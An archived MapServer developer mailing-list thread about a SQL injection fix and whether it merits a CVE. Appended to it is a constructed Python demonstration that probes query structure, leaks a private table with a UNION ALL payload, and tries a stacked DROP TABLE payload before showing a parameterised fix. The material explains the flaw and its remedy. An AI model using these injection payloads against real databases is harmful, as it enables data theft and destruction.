[mapserver-dev] [motion] release 5.6.9, 6.0.4, 6.2.2 and 6.4.1

Lime, Steve D (MNIT) Steve.Lime at state.mn.us
Tue Dec 31 09:14:24 PST 2013


Ah, true, and combined with a configuration that sets no limitations on output (e.g. 'gml_items' 'all'), there's your problem. --Steve
 
________________________________________
From: Even Rouault [even.rouault at mines-paris.org]
Sent: Tuesday, December 31, 2013 11:10 AM
To: mapserver-dev at lists.osgeo.org
Cc: Lime, Steve D (MNIT); thomas bonfort; Sebastiaan Couwenberg
Subject: Re: [mapserver-dev] [motion] release 5.6.9, 6.0.4, 6.2.2 and 6.4.1

On Tuesday 31 December 2013 18:06:08, Lime, Steve D (MNIT) wrote:
> Would be good to hear from Even. I think Thomas is correct. One can't
> manipulate the table list, nor can multiple statements be strung together.
> We're backporting to multiple branches out of an abundance of caution.

If you know the exact query structure (which is not difficult to get), you could
UNION ALL with content from other (possibly intended to be private) tables.

> --Steve
>
> ________________________________________
> From: mapserver-dev-bounces at lists.osgeo.org
> [mapserver-dev-bounces at lists.osgeo.org] on behalf of thomas bonfort
> [thomas.bonfort at gmail.com] Sent: Tuesday, December 31, 2013 9:02 AM
> To: Sebastiaan Couwenberg
> Cc: MapServer Dev Mailing List
> Subject: Re: [mapserver-dev] [motion] release 5.6.9, 6.0.4, 6.2.2 and 6.4.1
>
> Bas,
> My personal opinion is that a CVE wouldn't be needed as the
> vulnerability is not exploitable other than to return unfiltered data
> from the table, something that could/can already be done in a "valid"
> way by requesting an infinite time range. Again, this is my personal
> understanding, and if incorrect would indeed require a CVE.
>
> I'll pass the buck down to someone more knowledgeable of the issue to
> make the final call...
>
> regards,
> thomas
>
> On 31 December 2013 15:26, Sebastiaan Couwenberg <sebastic at xs4all.nl> wrote:
> > Have you considered requesting a CVE for the vulnerability to ease
> > tracking the patching of it by the various distributions?
> >
> > http://cve.mitre.org/
> >
> > Kind Regards,
> >
> > Bas
> >
> >
> > _______________________________________________
> > mapserver-dev mailing list
> > mapserver-dev at lists.osgeo.org
> > http://lists.osgeo.org/mailman/listinfo/mapserver-dev
>

--
Geospatial professional services
http://even.rouault.free.fr/services.html
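The point Even raises above (a single, fixed SELECT whose caller-supplied values are spliced into the SQL text can still be turned into a UNION ALL over another table, even when no second statement can be appended) as an added example. This is constructed illustration code, not MapServer's code and not part of the thread: the `features` and `private_users` tables, the time-bounded query shape and the use of SQLite as the backing store are all assumptions made for the demonstration.

```python
import sqlite3


def build_db():
    """Constructed sample schema, not MapServer data: a public layer table
    and a table the deployment never meant to serve."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE features (id INTEGER, name TEXT, ts TEXT);
        INSERT INTO features VALUES (1, 'river', '2013-01-01'),
                                    (2, 'road',  '2013-06-01');
        CREATE TABLE private_users (id INTEGER, email TEXT, pw_hash TEXT);
        INSERT INTO private_users VALUES (1, 'admin@example.org', 'hash-placeholder');
    """)
    return conn


def vulnerable_query(conn, tmin, tmax):
    """Hypothetical layer query: a fixed SELECT with the client-supplied
    time bounds spliced into the SQL text (the weak pattern)."""
    sql = ("SELECT id, name, ts FROM features "
           f"WHERE ts >= '{tmin}' AND ts <= '{tmax}'")
    return conn.execute(sql).fetchall()


def safe_query(conn, tmin, tmax):
    """Same query with bound parameters: the bounds are values, never SQL."""
    sql = "SELECT id, name, ts FROM features WHERE ts >= ? AND ts <= ?"
    return conn.execute(sql, (tmin, tmax)).fetchall()


def probe_column_count(conn, query_fn, max_cols=8):
    """Recover the SELECT's column count, which is all an attacker needs to
    know about the query structure: UNION ALL is only accepted when both
    sides have the same number of columns, so count the NULLs that work.
    The trailing -- comments out the quote the query appends after the input.
    Returns None when no probe produces the all-NULL row (e.g. bound params)."""
    for n in range(1, max_cols + 1):
        payload = "' UNION ALL SELECT " + ", ".join(["NULL"] * n) + " --"
        try:
            rows = query_fn(conn, "2013-01-01", payload)
        except sqlite3.Error:
            continue
        if (None,) * n in rows:
            return n
    return None


# With the column count (3) known, pull another table through the same single
# statement. No ';' is needed, so a driver that refuses stacked statements
# does not stop it.
EXFIL_PAYLOAD = "' UNION ALL SELECT id, email, pw_hash FROM private_users --"

# Stacking a second statement is what *is* blocked in this model: sqlite3's
# execute() refuses more than one statement per call.
STACKED_PAYLOAD = "'; DROP TABLE features; --"


def stacked_statement_rejected(conn):
    """True if the stacked payload was refused and the table survived."""
    try:
        vulnerable_query(conn, "2013-01-01", STACKED_PAYLOAD)
    except (sqlite3.Warning, sqlite3.Error):
        pass
    tables = {r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")}
    return "features" in tables


if __name__ == "__main__":
    db = build_db()
    print("columns:", probe_column_count(db, vulnerable_query))
    print("leaked :", vulnerable_query(db, "2013-01-01", EXFIL_PAYLOAD))
    print("safe   :", safe_query(db, "2013-01-01", EXFIL_PAYLOAD))
    print("stacked rejected:", stacked_statement_rejected(db))
```

Run stand-alone it prints the recovered column count, the `private_users` row returned through the public layer query, the empty result the parameterised query gives for the same input, and confirmation that the stacked `DROP TABLE` attempt was refused. The probe loop is what "know the exact query structure (which is not difficult to get)" amounts to in practice; the leaked values arrive in the query's own result columns, so the fix is binding the values (or otherwise keeping them out of the SQL text), not constraining what the query is allowed to select from.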



